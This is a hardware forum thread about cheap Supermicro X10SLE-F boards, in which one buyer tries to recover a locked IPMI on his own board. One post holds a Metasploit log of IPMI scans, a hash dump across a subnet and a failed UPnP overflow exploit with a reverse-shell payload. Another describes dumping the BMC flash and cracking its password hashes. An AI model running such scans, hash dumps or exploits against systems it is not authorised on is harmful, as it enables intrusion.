EU ebay: Supermicro X10SLE-F (Micro-Cloud node) usually under 10 Euro

Discussion in 'Great Deals' started by DanAnd, Jun 23, 2019.

  1. RageBone

    RageBone Active Member

    Joined:
    Jul 11, 2017
    Messages:
    164
    Likes Received:
    27
    @DanAnd
    Another option would be to Metasploit the ipmi.
    There are a few things you can do with that. The most time consuming would be to retrieve the hash of the password, which you'd need to crack.

    If you have soldering skills and equipment, you could also swap the ROM that the IPMI is stored on.
     
    #21
  2. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    @Guillem and @Aestr

    Thanks for the hints. I ordered the cable from an official supermicro reseller ( 18 Euros + shipping).

    @RageBone
    Thats also a good way to get on it. I would be able to do both, so I have a second and third plan, if I got stuck. Thanks!
     
    #22
  3. RageBone

    RageBone Active Member

    Joined:
    Jul 11, 2017
    Messages:
    164
    Likes Received:
    27
    #23
    DanAnd likes this.
  4. nerdalertdk

    nerdalertdk Member

    Joined:
    Mar 9, 2017
    Messages:
    80
    Likes Received:
    13
    Just bought two with heat sink for 80$ including Porto :)
     
    #24
    DanAnd likes this.
  5. nerdalertdk

    nerdalertdk Member

    Joined:
    Mar 9, 2017
    Messages:
    80
    Likes Received:
    13
    @DanAnd what cooler did you use ?
     
    #25
  6. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    I recycled an old supermicro "E6-2600 (LGA 2011) Narrow ILM" cpu cooler out of a 1U server. I will probably exchange it with a larger volume one, when I am able to run it (still waiting for the console cable delivery) and I am sure how much space I have around the chassis.


    IMG_20190708_180629.jpg
     
    #26
  7. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    And by the way: I couldn't "hack" the ipmi interface with metasploit. So I will have to wait for the console cable first.
     
    #27
  8. nerdalertdk

    nerdalertdk Member

    Joined:
    Mar 9, 2017
    Messages:
    80
    Likes Received:
    13
    Okay, bought the ones that for the server but wanted 2u more just didn’t know what fits


    Edit hmm this one seams to fit

    SNK-P0048PS
     
    #28
  9. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    The console cable arrived today. However, it didn't help me so far. I am still not able to power up the mainboard.
    I contacted Supermicro Support, but I am not sure how good the chances are.
     
    #29
  10. nerdalertdk

    nerdalertdk Member

    Joined:
    Mar 9, 2017
    Messages:
    80
    Likes Received:
    13
    that sucks, I have two on its way but i'm missing cpu and heatsink
     
    #30
  11. RageBone

    RageBone Active Member

    Joined:
    Jul 11, 2017
    Messages:
    164
    Likes Received:
    27
    @DanAnd you should be able to get a list list of users and the respective password hashes for them through metasploit as a last resort.
    Could crack those hashes : )
     
    #31
  12. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    As said, the IPMI Version is pretty safe, so all attempts didn't work out:
    Code:
           =[ metasploit v5.0.36-dev-                         ]
    + -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
    + -- --=[ 545 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    
    msf5 > use  auxiliary/scanner/ipmi/ipmi_version
    msf5 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 146.0.33.0/24
    RHOSTS => 146.0.33.0/24
    msf5 auxiliary(scanner/ipmi/ipmi_version) > run
    
    [*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
    [+] 146.0.33.34:623 - IPMI - IPMI-2.0 OEMID:4543232 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/ipmi/ipmi_version) >
    msf5 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 146.0.33.0/24
    RHOSTS => 146.0.33.0/24
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
    
    [*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) >
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 146.0.33.0/24
    RHOSTS => 146.0.33.0/24
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set THREADS 256
    THREADS => 256
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
    
    [*] Scanned  27 of 256 hosts (10% complete)
    [*] Scanned 134 of 256 hosts (52% complete)
    [*] Scanned 149 of 256 hosts (58% complete)
    [*] Scanned 225 of 256 hosts (87% complete)
    [*] Scanned 230 of 256 hosts (89% complete)
    [*] Scanned 231 of 256 hosts (90% complete)
    [*] Scanned 246 of 256 hosts (96% complete)
    [*] Scanned 253 of 256 hosts (98% complete)
    [*] Scanned 254 of 256 hosts (99% complete)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) >
    
           =[ metasploit v5.0.36-dev-                         ]
    + -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
    + -- --=[ 545 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    
    msf5 > use exploit/multi/upnp/libupnp_ssdp_overflow
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set RHOST 146.0.33.34
    RHOST => 146.0.33.34
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set LHOST 146.0.33.1
    LHOST => 146.0.33.1
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set PAYLOAD cmd/unix/reverse_openssl
    PAYLOAD => cmd/unix/reverse_openssl
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploid
    [-] Unknown command: exploid.
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploit
    
    [*] Started reverse double SSL handler on 146.0.33.1:4444
    [*] The system 146.0.33.34 did not reply to our M-SEARCH probe
    [-] Exploit aborted due to failure: no-target: No compatible target detected
    [*] Exploit completed, but no session was created.
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) >
    
     
    #32
  13. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    So I did it the hard way:
    I looked out for the BMC's flash chip, cleaned up the pins and used a chip grabber and SPI programmer to read out the flash.
    This was pretty straight forward, but I had to use an updated flashrom code, as the flash chip is a MX25L25635F which was not included in the current Ubuntu Linux release, which I am using.
    After figuring out the pin-outs, I connected GND, MISO, MOSI, CLK, CS, but left +3,3V open. Then I powered up the board and read everything from the flash chip into a file.

    Looking into the flash image, I found the wsman configuration, which points to a simple_auth.passwd file, which consists of 4 password hashes ;-)
    The used encryption method is pretty old: Traditional Unix Crypt (DES). That means the password is at max 8 characters long and the valid characters are ascii 7-bit.

    The first user is obvious: ADMIN with the hashed password of ADMIN.
    Since ADMIN/ADMIN does not work on either IPMItool nor on the Webinterface, I assume they have disabled that user, which is quite clever, as every script-kiddy will try to attempt the default usernames on IPMI Interfaces.

    So there are 3 hashes left. I give hashcat and my trusty Geforce 1060 GPU a try and hopefully I will figure out at least one password, so that I can do a factory reset. Then I can finally continue on my path to power up this little mainboard :)

    Cheers,

    Daniel
     
    #33
  14. nerdalertdk

    nerdalertdk Member

    Joined:
    Mar 9, 2017
    Messages:
    80
    Likes Received:
    13
    I really hope they used the same password because this is above what and can do :)

    Nice work
     
    #34
  15. gigatexal

    gigatexal I'm here to learn

    Joined:
    Nov 25, 2012
    Messages:
    2,649
    Likes Received:
    482
    With the reach STH has you would think someone would be either an employee of SM or connected to one to be able to get the admin password or at least the magic song and dance to reset it once and for all
     
    #35
  16. Guillem

    Guillem Member

    Joined:
    Nov 13, 2017
    Messages:
    32
    Likes Received:
    2
    So the issue is 'powering up' the server as in pressing the 'power on' button? It just stays on standby when you connect it? If that is the case, I bet there has to be a couple of pins you can short that are coming from the power distribution board that will power on the system. Either shorting them or pulling one up to 5V or down to ground.
     
    #36
  17. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    That's exactly what I think will be the easiest way. I contacted Supermicro Support on it, but they have to all the SM HQ first.

    There is basically just 8 thin data cables coming from the chassis to the mainboard
     
    #37
  18. Guillem

    Guillem Member

    Joined:
    Nov 13, 2017
    Messages:
    32
    Likes Received:
    2
    So what happens when you press the power switch on the board? Does it even try to do something?
     
    #38
  19. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    Pressing the Power-Button was basically the first thing I tried. Nothing is starting.
     
    #39
  20. Guillem

    Guillem Member

    Joined:
    Nov 13, 2017
    Messages:
    32
    Likes Received:
    2
    I imagined you did, but just in case :)

    What I would suggest is to find next to the thin cable connector on the motherboard an IC for power control. A lot of times this is an ADMxxxx, which tends to be in a small package with somewhere between 16 and 30 pins. If you find that, I bet one of the pins is connected to the enable specified on the datasheet, so you will just need to figure to which connector pin it's routed and provide the necessary voltage/gnd.
     
    #40

Share This Page